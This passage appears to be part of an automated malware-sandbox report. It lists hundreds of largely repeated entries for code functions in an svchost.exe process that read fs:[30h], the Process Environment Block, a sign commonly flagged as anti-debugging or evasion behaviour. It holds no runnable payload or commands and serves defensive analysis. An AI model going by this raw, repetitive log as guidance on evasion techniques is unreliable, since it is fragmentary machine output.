                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0373C7C0 mov eax, dword ptr fs:[00000030h] | 1_2_0373C7C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037B07C3 mov eax, dword ptr fs:[00000030h] | 1_2_037B07C3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037307AF mov eax, dword ptr fs:[00000030h] | 1_2_037307AF
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037E47A0 mov eax, dword ptr fs:[00000030h] | 1_2_037E47A0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037D678E mov eax, dword ptr fs:[00000030h] | 1_2_037D678E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03762674 mov eax, dword ptr fs:[00000030h] | 1_2_03762674
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037F866E mov eax, dword ptr fs:[00000030h] | 1_2_037F866E
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0376A660 mov eax, dword ptr fs:[00000030h] | 1_2_0376A660
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0374C640 mov eax, dword ptr fs:[00000030h] | 1_2_0374C640
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0374E627 mov eax, dword ptr fs:[00000030h] | 1_2_0374E627
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03766620 mov eax, dword ptr fs:[00000030h] | 1_2_03766620
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03768620 mov eax, dword ptr fs:[00000030h] | 1_2_03768620
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0373262C mov eax, dword ptr fs:[00000030h] | 1_2_0373262C
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03772619 mov eax, dword ptr fs:[00000030h] | 1_2_03772619
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_037AE609 mov eax, dword ptr fs:[00000030h] | 1_2_037AE609
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0374260B mov eax, dword ptr fs:[00000030h] | 1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374260B mov eax, dword ptr fs:[00000030h]1_2_0374260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE6F2 mov eax, dword ptr fs:[00000030h]1_2_037AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B06F1 mov eax, dword ptr fs:[00000030h]1_2_037B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A6C7 mov eax, dword ptr fs:[00000030h]1_2_0376A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037666B0 mov eax, dword ptr fs:[00000030h]1_2_037666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C6A6 mov eax, dword ptr fs:[00000030h]1_2_0376C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03734690 mov eax, dword ptr fs:[00000030h]1_2_03734690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376656A mov eax, dword ptr fs:[00000030h]1_2_0376656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738550 mov eax, dword ptr fs:[00000030h]1_2_03738550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740535 mov eax, dword ptr fs:[00000030h]1_2_03740535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E53E mov eax, dword ptr fs:[00000030h]1_2_0375E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6500 mov eax, dword ptr fs:[00000030h]1_2_037C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804500 mov eax, dword ptr fs:[00000030h]1_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375E5E7 mov eax, dword ptr fs:[00000030h]1_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037325E0 mov eax, dword ptr fs:[00000030h]1_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376C5ED mov eax, dword ptr fs:[00000030h]1_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037365D0 mov eax, dword ptr fs:[00000030h]1_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A5D0 mov eax, dword ptr fs:[00000030h]1_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E5CF mov eax, dword ptr fs:[00000030h]1_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037545B1 mov eax, dword ptr fs:[00000030h]1_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B05A7 mov eax, dword ptr fs:[00000030h]1_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E59C mov eax, dword ptr fs:[00000030h]1_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov eax, dword ptr fs:[00000030h]1_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732582 mov ecx, dword ptr fs:[00000030h]1_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764588 mov eax, dword ptr fs:[00000030h]1_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375A470 mov eax, dword ptr fs:[00000030h]1_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC460 mov ecx, dword ptr fs:[00000030h]1_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA456 mov eax, dword ptr fs:[00000030h]1_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372645D mov eax, dword ptr fs:[00000030h]1_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375245A mov eax, dword ptr fs:[00000030h]1_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E443 mov eax, dword ptr fs:[00000030h]1_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376A430 mov eax, dword ptr fs:[00000030h]1_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372E420 mov eax, dword ptr fs:[00000030h]1_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372C427 mov eax, dword ptr fs:[00000030h]1_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B6420 mov eax, dword ptr fs:[00000030h]1_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768402 mov eax, dword ptr fs:[00000030h]1_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037304E5 mov ecx, dword ptr fs:[00000030h]1_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037644B0 mov ecx, dword ptr fs:[00000030h]1_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BA4B0 mov eax, dword ptr fs:[00000030h]1_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037364AB mov eax, dword ptr fs:[00000030h]1_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EA49A mov eax, dword ptr fs:[00000030h]1_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372CB7E mov eax, dword ptr fs:[00000030h]1_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEB50 mov eax, dword ptr fs:[00000030h]1_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4B4B mov eax, dword ptr fs:[00000030h]1_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C6B40 mov eax, dword ptr fs:[00000030h]1_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB40 mov eax, dword ptr fs:[00000030h]1_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D8B42 mov eax, dword ptr fs:[00000030h]1_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EB20 mov eax, dword ptr fs:[00000030h]1_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F8B28 mov eax, dword ptr fs:[00000030h]1_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AEB1D mov eax, dword ptr fs:[00000030h]1_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804B00 mov eax, dword ptr fs:[00000030h]1_2_03804B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738BF0 mov eax, dword ptr fs:[00000030h]1_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EBFC mov eax, dword ptr fs:[00000030h]1_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCBF0 mov eax, dword ptr fs:[00000030h]1_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEBD0 mov eax, dword ptr fs:[00000030h]1_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03750BCB mov eax, dword ptr fs:[00000030h]1_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730BCD mov eax, dword ptr fs:[00000030h]1_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740BBE mov eax, dword ptr fs:[00000030h]1_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E4BB0 mov eax, dword ptr fs:[00000030h]1_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03802B57 mov eax, dword ptr fs:[00000030h]1_2_03802B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03804A80 mov eax, dword ptr fs:[00000030h]1_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037ACA72 mov eax, dword ptr fs:[00000030h]1_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA6F mov eax, dword ptr fs:[00000030h]1_2_0376CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DEA60 mov eax, dword ptr fs:[00000030h]1_2_037DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03736A50 mov eax, dword ptr fs:[00000030h]1_2_03736A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740A5B mov eax, dword ptr fs:[00000030h]1_2_03740A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03754A35 mov eax, dword ptr fs:[00000030h]1_2_03754A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA38 mov eax, dword ptr fs:[00000030h]1_2_0376CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376CA24 mov eax, dword ptr fs:[00000030h]1_2_0376CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375EA2E mov eax, dword ptr fs:[00000030h]1_2_0375EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BCA11 mov eax, dword ptr fs:[00000030h]1_2_037BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376AAEE mov eax, dword ptr fs:[00000030h]1_2_0376AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730AD0 mov eax, dword ptr fs:[00000030h]1_2_03730AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03764AD0 mov eax, dword ptr fs:[00000030h]1_2_03764AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786ACC mov eax, dword ptr fs:[00000030h]1_2_03786ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03738AA0 mov eax, dword ptr fs:[00000030h]1_2_03738AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03786AA4 mov eax, dword ptr fs:[00000030h]1_2_03786AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03768A90 mov edx, dword ptr fs:[00000030h]1_2_03768A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA80 mov eax, dword ptr fs:[00000030h]1_2_0373EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D4978 mov eax, dword ptr fs:[00000030h]1_2_037D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC97C mov eax, dword ptr fs:[00000030h]1_2_037BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03756962 mov eax, dword ptr fs:[00000030h]1_2_03756962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov edx, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377096E mov eax, dword ptr fs:[00000030h]1_2_0377096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B0946 mov eax, dword ptr fs:[00000030h]1_2_037B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B892A mov eax, dword ptr fs:[00000030h]1_2_037B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C892B mov eax, dword ptr fs:[00000030h]1_2_037C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BC912 mov eax, dword ptr fs:[00000030h]1_2_037BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03728918 mov eax, dword ptr fs:[00000030h]1_2_03728918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AE908 mov eax, dword ptr fs:[00000030h]1_2_037AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037629F9 mov eax, dword ptr fs:[00000030h]1_2_037629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BE9E0 mov eax, dword ptr fs:[00000030h]1_2_037BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373A9D0 mov eax, dword ptr fs:[00000030h]1_2_0373A9D0
